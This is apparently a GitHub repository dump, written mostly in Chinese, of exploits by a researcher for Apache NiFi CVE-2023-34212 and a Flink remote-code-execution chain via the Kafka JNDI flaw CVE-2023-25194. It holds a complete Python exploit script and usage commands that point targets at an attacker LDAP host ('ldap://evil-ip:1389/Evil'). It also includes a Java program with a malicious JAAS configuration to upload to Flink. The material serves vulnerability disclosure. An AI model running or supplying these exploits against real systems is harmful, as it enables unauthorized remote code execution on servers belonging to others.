├── CVE-2023-34212 ├── CVE-2023-34212.py ├── ReadMe.md ├── pic │ ├── nifi-http.gif │ └── nifi-https.gif └── requirement.txt ├── Flink-Kafka-Vul ├── 1.jpg ├── 2.jpg ├── 3.jpg ├── 4.jpg ├── FlinkJarTest │ ├── .gitignore │ ├── .idea │ │ ├── .gitignore │ │ ├── encodings.xml │ │ ├── inspectionProfiles │ │ │ └── Project_Default.xml │ │ ├── misc.xml │ │ └── uiDesigner.xml │ ├── dependency-reduced-pom.xml │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── FlinkKafkaDemo.java └── README.md └── README.md /CVE-2023-34212/CVE-2023-34212.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2023/6/15 下午6:18 4 | # @Author : Veraxy00 5 | # @FileName: CVE-2023-34212.py 6 | # @Software: PyCharm 7 | import json 8 | import requests 9 | import argparse 10 | import sys 11 | from urllib.parse import urlparse, urlunparse 12 | import urllib3 13 | 14 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 15 | 16 | ''' 17 | 获取client-id、process-groups-id、version 18 | ''' 19 | def get_Info(target, InfoName ,cookie): 20 | if InfoName == "Client-id": # 获取client-id 21 | api_url = '/nifi-api/flow/client-id' 22 | elif InfoName == "Process-groups-id": # 获取process-groups-id 23 | api_url = '/nifi-api/flow/process-groups/root' 24 | elif InfoName == "Version": # 获取version 25 | api_url = '/nifi-api/system-diagnostics' 26 | url = urlunparse(target) + api_url 27 | headers = {'Host': target.netloc, 'Cookie': '__Host-Authorization-Bearer=' + cookie} 28 | r = requests.get(url, headers=headers, verify=False) 29 | if r.status_code == 200: 30 | print("Get "+ InfoName +"------------------Success") 31 | return r.text 32 | else: 33 | print("Get "+ InfoName +"------------------Failure") 34 | 35 | def make_auth_request(url, host, data, method, cookie, module): 36 | headers = {'Host': host, 'Content-Type': 'application/json', 'Cookie': '__Host-Authorization-Bearer=' + cookie, 'Authorization': 'Bearer ' + cookie} 37 | r = requests.request(method, url, headers=headers, data=data, verify=False) 38 | if r.status_code == 201: 39 | print(module+"------------------Success") 40 | return r.text 41 | elif r.status_code == 200: 42 | print(module + "------------------Success") 43 | return r.text 44 | else: 45 | print(module+"------------------Failure") 46 | ''' 47 | 创建JndiJmsConnectionFactoryProvider控制器 48 | ''' 49 | def Create_Controller(target, cookie, version,clientId, process_groups_id): 50 | url = urlunparse(target) +'/nifi-api/process-groups/'+ process_groups_id +'/controller-services' 51 | data = json.dumps({'revision':{'clientId':clientId,'version':0},'disconnectedNodeAcknowledged':False,'component':{'type':'org.apache.nifi.jms.cf.JndiJmsConnectionFactoryProvider','bundle':{'group':'org.apache.nifi','artifact':'nifi-jms-processors-nar','version':version},'name':'JndiJmsConnectionFactoryProvider00'}}) 52 | return make_auth_request(url, target.netloc, data, 'post', cookie, "Create JndiJmsConnectionFactoryProvider") 53 | 54 | ''' 55 | 为指定JndiJmsConnectionFactoryProvider控制器编辑JNDI连接属性值 56 | ''' 57 | def Edit_ControllerInfo(target, cookie, clientId, ControllerId, ControllerName, JNDI_Initial_Context_Factory_Class, JNDI_Provider_URL, JNDI_Name_of_the_Connection_Factory): 58 | url = urlunparse(target) + '/nifi-api/controller-services/' + ControllerId 59 | data = json.dumps({'disconnectedNodeAcknowledged':False,'component':{'id':ControllerId,'name':ControllerName,'comments':'','properties':{'java.naming.factory.initial':JNDI_Initial_Context_Factory_Class,'java.naming.provider.url':JNDI_Provider_URL,'connection.factory.name':JNDI_Name_of_the_Connection_Factory}},'revision':{'clientId':clientId,'version':1}}) 60 | return make_auth_request(url, target.netloc, data, 'put', cookie, "Edit JndiJmsConnectionFactoryProvider") 61 | ''' 62 | 启动控制器 63 | ''' 64 | def Enable_Controller(target, cookie, clientId, ControllerId): 65 | url = urlunparse(target) + '/nifi-api/controller-services/' + ControllerId + '/run-status' 66 | data = json.dumps({'revision':{'clientId':clientId,'version':2},'disconnectedNodeAcknowledged':False,'state':'ENABLED'}) 67 | return make_auth_request(url, target.netloc, data, 'put', cookie, "Enable JndiJmsConnectionFactoryProvider") 68 | ''' 69 | 创建处理器 70 | ''' 71 | def Create_Processor(target, cookie, clientId, process_groups_id, ProcessorType, ProcessorArtifact, ProcessorName,version): 72 | url = urlunparse(target) +'/nifi-api/process-groups/'+ process_groups_id +'/processors' 73 | data = json.dumps({'revision':{'clientId':clientId,'version':0},'disconnectedNodeAcknowledged':False,'component':{'type':ProcessorType,'bundle':{'group':'org.apache.nifi','artifact':ProcessorArtifact,'version':version},'name':ProcessorName,'position':{'x':427.15151515151524,'y':252.84848484848487}}}) 74 | return make_auth_request(url, target.netloc, data, 'post', cookie, "Create Processor") 75 | ''' 76 | 为处理器创建关联关系 77 | ''' 78 | def Create_ProcessorConnections(target, cookie, clientId, process_groups_id, SourceId, DestinationId): 79 | url = urlunparse(target) + '/nifi-api/process-groups/' + process_groups_id + '/connections' 80 | data = json.dumps({'revision':{'clientId':clientId,'version':0},'disconnectedNodeAcknowledged':False,'component':{'name':'','source':{'id':SourceId,'groupId':process_groups_id,'type':'PROCESSOR'},'destination':{'id':DestinationId,'groupId':process_groups_id,'type':'PROCESSOR'},'selectedRelationships':['success'],'flowFileExpiration':'0 sec','backPressureDataSizeThreshold':'1 GB','backPressureObjectThreshold':'10000','bends':[],'prioritizers':[],'loadBalanceStrategy':'DO_NOT_LOAD_BALANCE','loadBalancePartitionAttribute':'','loadBalanceCompression':'DO_NOT_COMPRESS'}}) 81 | return make_auth_request(url, target.netloc, data, 'post', cookie, "Create relationship for ConsumeJMS and LogAttribute") 82 | ''' 83 | 编辑ConsumeJMS处理器属性值,添加JndiJmsConnectionFactoryProvider、Destination Name 84 | ''' 85 | def Edit_ProcessorInfo(target, cookie, clientId, Processorid ,Controllerid): 86 | url = urlunparse(target) + '/nifi-api/processors/' + Processorid 87 | data = json.dumps({'component':{'id':Processorid,'name':'ConsumeJMS','config':{'concurrentlySchedulableTaskCount':'1','schedulingPeriod':'0 sec','executionNode':'ALL','penaltyDuration':'30 sec','yieldDuration':'1 sec','bulletinLevel':'WARN','schedulingStrategy':'TIMER_DRIVEN','comments':'','autoTerminatedRelationships':[],'properties':{'Connection Factory Service':Controllerid,'Destination Name':'toNifi'}},'state':'STOPPED'},'revision':{'clientId':clientId,'version':2},'disconnectedNodeAcknowledged':False}) 88 | return make_auth_request(url, target.netloc, data, 'put', cookie, "Edit ConsumeJMS") 89 | ''' 90 | 启动处理器 91 | ''' 92 | def Enable_Processor(target, cookie, clientId, ProcessorId): 93 | url = urlunparse(target) + '/nifi-api/processors/' + ProcessorId + '/run-status' 94 | data = json.dumps({'revision':{'clientId':clientId,'version':3},'state':'RUNNING','disconnectedNodeAcknowledged':False}) 95 | return make_auth_request(url, target.netloc, data, 'put', cookie, "Enable Processor") 96 | 97 | def exploit(target, cookie, JNDI_Initial_Context_Factory_Class, JNDI_Provider_URL, JNDI_Name_of_the_Connection_Factory): 98 | # 获取Client-Id、process-groups-id、版本号 99 | ClientId = str(get_Info(target, "Client-id", cookie)) 100 | process_groups_id = json.loads(get_Info(target, "Process-groups-id", cookie)).get('processGroupFlow').get('id') 101 | version = json.loads(get_Info(target, "Version",cookie)).get('systemDiagnostics').get('aggregateSnapshot').get('versionInfo').get('niFiVersion') 102 | 103 | # 创建JndiJmsConnectionFactoryProvider控制器 104 | Controller_Info = Create_Controller(target,cookie,version,ClientId,process_groups_id) 105 | # 提取JndiJmsConnectionFactoryProvider的id、name 106 | ControllerID = json.loads(Controller_Info).get('id') 107 | ControllerNAME = json.loads(Controller_Info).get('component').get('name') 108 | Edit_ControllerInfo(target,cookie,ClientId,ControllerID, ControllerNAME, JNDI_Initial_Context_Factory_Class, JNDI_Provider_URL, JNDI_Name_of_the_Connection_Factory) 109 | Enable_Controller(target,cookie,ClientId,ControllerID) 110 | 111 | # 创建ConsumeJMS处理器 112 | ConsumeJMS_Info = Create_Processor(target, cookie, ClientId, process_groups_id, 'org.apache.nifi.jms.processors.ConsumeJMS', 'nifi-jms-processors-nar', 'ConsumeJMS',version) 113 | # 创建LogAttribute处理器 114 | LogAttribute_Info = Create_Processor(target, cookie, ClientId, process_groups_id, 'org.apache.nifi.processors.standard.LogAttribute', 'nifi-standard-nar', 'LogAttribute',version) 115 | # 提取ConsumeJMS、LogAttribute的id 116 | ConsumeJMSID = json.loads(ConsumeJMS_Info).get('id') 117 | LogAttributeID = json.loads(LogAttribute_Info).get('id') 118 | # 创建连接(ConsumeJMS和LogAttribute) 119 | Create_ProcessorConnections(target, cookie, ClientId, process_groups_id, ConsumeJMSID, LogAttributeID) 120 | 121 | # 为ConsumeJMS处理器添加JndiJmsConnectionFactoryProvider控制器 122 | Edit_ProcessorInfo(target, cookie, ClientId, ConsumeJMSID, ControllerID) 123 | Enable_Processor(target, cookie, ClientId, ConsumeJMSID) 124 | print("Exploit------------------Success") 125 | 126 | if __name__ == '__main__': 127 | try: 128 | parser = argparse.ArgumentParser(description='CVE-2023-34212 exploit') 129 | parser.add_argument('-t', '--target',help='target 指定目标NIFI系统的地址,必要参数. \neg: http://192.168.25.147:8080', required=True) 130 | parser.add_argument('-u', '--JndiUrl', help='JNDI服务监听地址,必要参数. eg: ldap://xx.xx.xx.xx:1389', required=True) 131 | parser.add_argument('-l', '--JndiFactoryLocation', help='访问JNDI实例对象地址,必要参数. \neg: ldap://xx.xx.xx.xx:1389/Evil', required=True) 132 | parser.add_argument('-c', '--cookieBearer', help='Cookie中Bearer值.') 133 | parser.add_argument('--JndiFactoryClass', help='JNDI工厂类. eg: com.sun.jndi.ldap.LdapCtxFactory', default='com.sun.jndi.ldap.LdapCtxFactory') 134 | args = parser.parse_args() 135 | # 提取命令行信息 136 | target = urlparse(args.target.rstrip('/')) 137 | JNDI_Initial_Context_Factory_Class = args.JndiFactoryClass 138 | JNDI_Provider_URL = args.JndiUrl 139 | JNDI_Name_of_the_Connection_Factory = args.JndiFactoryLocation 140 | if target.scheme == "https": 141 | if args.cookieBearer: 142 | cookie = args.cookieBearer 143 | else: 144 | print("缺少Cookie,请重新调用------------------Failure") 145 | sys.exit() 146 | else: 147 | cookie = "" 148 | exploit(target, cookie, JNDI_Initial_Context_Factory_Class, JNDI_Provider_URL, JNDI_Name_of_the_Connection_Factory) 149 | 150 | except Exception as e: 151 | print(e) -------------------------------------------------------------------------------- /CVE-2023-34212/ReadMe.md: -------------------------------------------------------------------------------- 1 | # Apache NiFi 反序列化漏洞(CVE-2023-34212) 2 | 3 | 攻击者利用此漏洞执行代码。 4 | 5 | https://lists.apache.org/thread/w5rm46fxmvxy216tglf0dv83wo6gnzr5 6 | 7 | Apache NiFi 从1.14.0版本开始默认要求身份认证。 8 | 9 | ## 漏洞利用 10 | Usage: 11 | 12 | ```shell 13 | CVE-2023-34212.py [-h] -t TARGET -u JNDIURL -l JNDIFACTORYLOCATION 14 | [-c COOKIEBEARER] 15 | [--JndiFactoryClass JNDIFACTORYCLASS] 16 | ``` 17 | optional arguments: 18 | 19 | * -h, --help show this help message and exit 20 | 21 | * -t TARGET, --target TARGET 22 | target 指定目标NIFI系统的地址,**必要参数**. eg: 23 | http://192.168.25.147:8080 24 | 25 | * -u JNDIURL, --JndiUrl JNDIURL 26 | JNDI服务监听地址,**必要参数**. eg: ldap://xx.xx.xx.xx:1389 27 | 28 | * -l JNDIFACTORYLOCATION, --JndiFactoryLocation JNDIFACTORYLOCATION 29 | 访问JNDI实例对象地址,**必要参数**. eg: ldap://xx.xx.xx.xx:1389/Evil 30 | 31 | * -c COOKIEBEARER, --cookieBearer COOKIEBEARER 32 | Cookie中Bearer值. 33 | 34 | * --JndiFactoryClass JNDIFACTORYCLASS 35 | JNDI工厂类. eg: com.sun.jndi.ldap.LdapCtxFactory 36 | 37 | 38 | **注意:** 39 | 40 | 1. 通常以`https`开头的目标要求认证,运行脚本时须携带Cookie,否则不通过。\ 41 | eg:  数据包显示`Cookie: __Host-Authorization-Bearer=eyJhbGciOiJIUzI1NiJ9-rqWw`,则在运行脚本时添加\ 42 | `--cookieBearer=eyJhbGciOiJIUzI1NiJ9-rqWw`即可。 43 | 44 | 2. `JNDIURL`与`JndiFactoryLocation`中的地址一致,指向相同的JNDI服务器。\ 45 | eg:  -u=ldap://123.123.123.123:1389 -l=ldap://123.123.123.123:1389/Evil 46 | 47 |
48 | 49 | 测试**不要求认证**的目标: 50 | 51 | ``` 52 | python CVE-2023-34212.py -t http://192.168.25.152:8080 -u ldap://evil-ip:1389 -l ldap://evil-ip:1389/Evil 53 | ``` 54 | ![](pic/nifi-http.gif) 55 | 56 |
57 | 58 | 测试**要求认证**的目标: 59 | 60 | ``` 61 | python CVE-2023-34212.py -t https://192.168.25.151:8443 -u ldap://evil-ip:1389 -l ldap://evil-ip:1389/Evil --cookieBearer=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImlzcyI6IlNpbmdsZVVzZXJMb2dpbklkZW50aXR5UHJvdmlkZXIiLCJhdWQiOiJTaW5nbGVVc2VyTG9naW5JZGVudGl0eVByb3ZpZGVyIiwicHJlZmVycmVkX3VzZXJuYW1lIjoiYWRtaW4iLCJraWQiOjEsImV4cCI6MTY4NzIwNjMwNywiaWF0IjoxNjg3MTc3NTA3fQ.YsgXKWdhT0jAupZVTHEsIDc20xbW3kk67EopnbH0FlM 62 | ``` 63 | ![](pic/nifi-https.gif) 64 | -------------------------------------------------------------------------------- /CVE-2023-34212/pic/nifi-http.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/CVE-2023-34212/pic/nifi-http.gif -------------------------------------------------------------------------------- /CVE-2023-34212/pic/nifi-https.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/CVE-2023-34212/pic/nifi-https.gif -------------------------------------------------------------------------------- /CVE-2023-34212/requirement.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /Flink-Kafka-Vul/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/Flink-Kafka-Vul/1.jpg -------------------------------------------------------------------------------- /Flink-Kafka-Vul/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/Flink-Kafka-Vul/2.jpg -------------------------------------------------------------------------------- /Flink-Kafka-Vul/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/Flink-Kafka-Vul/3.jpg -------------------------------------------------------------------------------- /Flink-Kafka-Vul/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Veraxy00/SecVulList-Veraxy00/85e404443c3f40e32fb862604af561c035280d15/Flink-Kafka-Vul/4.jpg -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | !.mvn/wrapper/maven-wrapper.jar 3 | !**/src/main/**/target/ 4 | !**/src/test/**/target/ 5 | 6 | ### IntelliJ IDEA ### 7 | .idea/modules.xml 8 | .idea/jarRepositories.xml 9 | .idea/compiler.xml 10 | .idea/libraries/ 11 | *.iws 12 | *.iml 13 | *.ipr 14 | 15 | ### Eclipse ### 16 | .apt_generated 17 | .classpath 18 | .factorypath 19 | .project 20 | .settings 21 | .springBeans 22 | .sts4-cache 23 | 24 | ### NetBeans ### 25 | /nbproject/private/ 26 | /nbbuild/ 27 | /dist/ 28 | /nbdist/ 29 | /.nb-gradle/ 30 | build/ 31 | !**/src/main/**/build/ 32 | !**/src/test/**/build/ 33 | 34 | ### VS Code ### 35 | .vscode/ 36 | 37 | ### Mac OS ### 38 | .DS_Store -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 72 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/dependency-reduced-pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4.0.0 4 | org.example 5 | FlinkJarTest 6 | 1.0-SNAPSHOT 7 | 8 | 9 | 10 | maven-shade-plugin 11 | 3.2.4 12 | 13 | 14 | package 15 | 16 | shade 17 | 18 | 19 | 20 | 21 | FlinkKafkaDemo 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | org.example 4 | FlinkJarTest 5 | 1.0-SNAPSHOT 6 | 7 | 8 | 9 | 10 | org.apache.flink 11 | flink-core 12 | 1.11.3 13 | 14 | 15 | org.apache.flink 16 | flink-streaming-java_2.11 17 | 1.11.3 18 | 19 | 20 | org.apache.flink 21 | flink-connector-kafka_2.11 22 | 1.11.3 23 | 24 | 25 | 26 | 27 | org.apache.kafka 28 | kafka-clients 29 | 2.8.1 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | org.apache.maven.plugins 38 | maven-shade-plugin 39 | 3.2.4 40 | 41 | 42 | package 43 | 44 | shade 45 | 46 | 47 | 48 | 49 | FlinkKafkaDemo 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/FlinkJarTest/src/main/java/FlinkKafkaDemo.java: -------------------------------------------------------------------------------- 1 | import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment; 2 | import org.apache.flink.streaming.connectors.kafka.FlinkKafkaConsumer; 3 | import org.apache.flink.streaming.util.serialization.SimpleStringSchema; 4 | 5 | import java.util.Properties; 6 | 7 | public class FlinkKafkaDemo { 8 | public static void main(String[] args) throws Exception { 9 | // 设置执行环境 10 | final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment(); 11 | // 配置 Kafka 连接属性 12 | Properties properties = new Properties(); 13 | properties.setProperty("bootstrap.servers", "192.168.25.147:9092"); 14 | properties.setProperty("group.id", "flink-kafka-demo"); 15 | properties.setProperty("security.protocol", "SASL_PLAINTEXT"); 16 | properties.setProperty("sasl.mechanism", "PLAIN"); 17 | properties.setProperty("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://xx.xx.xx.xx:1389/xx\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"); 18 | 19 | 20 | FlinkKafkaConsumer consumer = new FlinkKafkaConsumer("quickstart-events", new SimpleStringSchema(), properties); 21 | 22 | // 从 Kafka 中读取数据 23 | env.addSource(consumer).print(); 24 | 25 | // 执行程序 26 | env.execute("Flink Kafka Demo"); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Flink-Kafka-Vul/README.md: -------------------------------------------------------------------------------- 1 | # Flink-Kafka-Vul 2 | **Apache Flink远程代码执行漏洞。** 3 | 4 | Apache Flink Web UI 默认没有用户权限认证,攻击者可以直接上传恶意Jar包,通过指定Kafka数据源连接属性,利用Apache Kafka JNDI注入(CVE-2023-25194)漏洞[1]攻击Flink,最终实现远程代码执行。 5 | 6 | [1] https://kafka.apache.org/cve-list#CVE-2023-25194 7 | 8 | # 利用 9 | 10 | ## 编写不安全的Flink程序 11 | 12 | 指定Kafka连接参数,其中`sasl.jaas.config`属性设置为`"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";`,服务器将连接到攻击者的 LDAP 服务器并反序列化 LDAP 响应。 13 | ``` 14 | // 设置执行环境 15 | final StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment(); 16 | // 配置 Kafka 连接属性 17 | Properties properties = new Properties(); 18 | properties.setProperty("bootstrap.servers", "192.168.25.147:9092"); 19 | properties.setProperty("group.id", "flink-kafka-demo"); 20 | properties.setProperty("security.protocol", "SASL_PLAINTEXT"); 21 | properties.setProperty("sasl.mechanism", "PLAIN"); 22 | properties.setProperty("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://attacker_server\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"); 23 | 24 | 25 | FlinkKafkaConsumer consumer = new FlinkKafkaConsumer("quickstart-events", new SimpleStringSchema(), properties); 26 | 27 | // 从 Kafka 中读取数据 28 | env.addSource(consumer).print(); 29 | 30 | // 执行程序 31 | env.execute("Flink Kafka Demo"); 32 | ``` 33 | 34 | ## 触发漏洞 35 | 36 | 自行将Flink程序打包为Jar: 37 | 38 | ![](1.jpg) 39 | 40 | 在Apache Flink Dashboard上传恶意Jar,并提交任务: 41 | 42 | ![](2.jpg) 43 | 44 | 攻击者服务器: 45 | 46 | ![](3.jpg) 47 | 48 | DNSlog服务器: 49 | 50 | ![](4.jpg) 51 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SecVulList-Veraxy00 2 | 分享一些我发现的漏洞,涉及细节和利用。 3 | 4 | ## [Apache Flink远程代码执行漏洞](https://github.com/Veraxy00/SecVulList-Veraxy00/tree/main/Flink-Kafka-Vul) 5 | 6 | Apache Flink Web UI 默认没有用户权限认证,攻击者可以直接上传恶意Jar包,通过指定Kafka数据源连接属性,利用Apache Kafka JNDI注入(CVE-2023-25194)漏洞[1]攻击Flink,最终实现远程代码执行。 7 | 8 | [1] https://kafka.apache.org/cve-list#CVE-2023-25194 9 | 10 | 11 | ## [Apache NiFi 反序列化漏洞(CVE-2023-34212)](https://github.com/Veraxy00/SecVulList-Veraxy00/tree/main/CVE-2023-34212) 12 | 13 | Apache NiFi 中多个JMS组件存在JNDI注入,可能反序列化远程不受信任的数据。 14 | 15 | 参考: 16 | https://lists.apache.org/thread/w5rm46fxmvxy216tglf0dv83wo6gnzr5 --------------------------------------------------------------------------------